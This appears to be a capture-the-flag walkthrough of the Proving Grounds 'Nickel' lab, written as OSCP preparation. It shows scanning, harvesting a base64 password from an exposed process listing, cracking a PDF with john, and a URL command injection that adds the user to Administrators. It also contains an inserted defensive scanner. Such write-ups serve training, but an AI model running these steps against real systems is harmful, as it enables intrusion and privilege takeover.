Proving Grounds: Nickel

Al1z4deh:~# echo "Welcome"
Jan 8, 2023

Today we will take a look at Proving Grounds: Nickel. My purpose in sharing this post is to prepare for the OSCP exam, and also to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
| 256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_ 256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2022-11-13T02:21:18
|_Not valid after: 2023-05-15T02:21:18
|_ssl-date: 2023-01-08T15:57:36+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-01-08T15:56:29+00:00
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • 33333 (dgi-serv)

Nothing yet.

  • 8089

Port 8089 seems to be some kind of development environment.

Clicking a button out of curiosity

The button redirected us to a completely different address, but the same port (33333) was open on the target IP. Let’s check it out for ourselves with curl.

  • ariah

I changed the request method to POST.

└─$ curl -X POST http://192.168.68.99:33333/list-running-procs
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>

It requires a Content-Length header.

└─$ curl -d "" -X POST http://192.168.68.99:33333/list-running-procs

name : System Idle Process
commandline :

name : System
commandline :

name : Registry
commandline :

name : smss.exe
commandline :

name : csrss.exe
commandline :

name : wininit.exe
commandline :

name : csrss.exe
commandline :

name : winlogon.exe
commandline : winlogon.exe

name : services.exe
commandline :

name : lsass.exe
commandline : C:\Windows\system32\lsass.exe

name : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3bd3855 /state1:0x41c64e6d

name : dwm.exe
commandline : "dwm.exe"

name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1

name : Memory Compression
commandline :

name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

--user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

We found credentials for ariah.

Let’s decode the password with base64.

└─$ echo "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" | base64 -d
NowiseSloopTheory139
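As an added example that is not part of the original post, the Python scanner below reads the "name : / commandline :" listing format the dev-api on port 33333 returned above, flags any process whose command line passes a password-style argument, and tries to base64-decode the value; the sample input is constructed from two entries of that listing. This is the check a defender would run over a process inventory, because an argument on a command line is visible to every local user and to any service that enumerates processes.

```python
import base64
import re

# Constructed sample in the "name : / commandline :" format that the dev-api
# on port 33333 returned above (two entries taken from that listing).
SAMPLE_PROCS = """\
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws80.ps1

name : cmd.exe
commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
"""

# Argument names that commonly carry a secret or a username on the command line.
SECRET_FLAG = re.compile(r'(?:^|\s)(?:-p|--password|--pass|--pwd)\s+"?([^"\s]+)"?', re.I)
USER_FLAG = re.compile(r'(?:^|\s)(?:-u|--user|--username)\s+"?([^"\s]+)"?', re.I)

def parse_procs(text):
    """Turn the dev-api listing into a list of (name, commandline) tuples."""
    procs, name = [], None
    for line in text.splitlines():
        if line.startswith("name :"):
            name = line[len("name :"):].strip()
        elif line.startswith("commandline :") and name is not None:
            procs.append((name, line[len("commandline :"):].strip()))
            name = None
    return procs

def maybe_decode(token):
    """Return the decoded text if token is base64 of printable text, else None."""
    if len(token) < 8 or len(token) % 4:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8").strip()
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None

def find_exposed_secrets(text):
    """Flag every process whose command line carries a password-style argument."""
    findings = []
    for name, cmd in parse_procs(text):
        secret = SECRET_FLAG.search(cmd)
        if not secret:
            continue
        user = USER_FLAG.search(cmd)
        findings.append({"process": name, "user": user.group(1) if user else None,
                         "secret": secret.group(1), "decoded": maybe_decode(secret.group(1))})
    return findings
```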

Log in with SSH.

  • ssh
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.

ariah@NICKEL C:\Users\ariah>whoami /all

USER INFORMATION
----------------

User Name SID
============ =============================================
nickel\ariah S-1-5-21-2696774334-3254175373-101825863-1003


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled

We only have low-level privileges.

  • ftp
└─$ ftp 192.168.68.99
Connected to 192.168.68.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.68.99:kali): ariah
331 Password required for ariah
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp 46235 Sep 01 2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> mget Infrastructure.pdf
mget Infrastructure.pdf [anpqy?]? y
200 Port command successful
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |************************************************************************************************************************************************| 46235 242.10 KiB/s 00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:00 (241.59 KiB/s)
ftp> exit
221 Goodbye

The FTP share contains a password-protected PDF file.

Crack the password with John the Ripper and read the contents.

└─$ pdf2john Infrastructure.pdf > hash

└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168 (Infrastructure.pdf)
1g 0:00:01:02 DONE (2023-01-08 20:05) 0.01605g/s 160633p/s 160633c/s 160633C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.

Browse these sites locally with curl

I don’t know what to do, so I’m asking for help.

A PowerShell-based service appeared in front of us. Let’s check it.

ariah@NICKEL C:\Users\ariah>curl http://nickel?whoami
<!doctype html><html><body>dev-api started at 2022-11-13T18:21:29

<pre>nt authority\system
</pre>
</body></html>

The service runs as NT AUTHORITY\SYSTEM. Let’s grant administrator rights to our current user.

Don’t forget to URL-encode the command.

ariah@NICKEL C:\Users\ariah>curl http://nickel?net%20localgroup%20Administrators%20ariah%20%2Fadd
<!doctype html><html><body>dev-api started at 2022-11-13T18:21:29

<pre>The command completed successfully.

</pre>
</body></html>
ariah@NICKEL C:\Users\ariah>whoami /all

POC

And now we are an Administrator.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
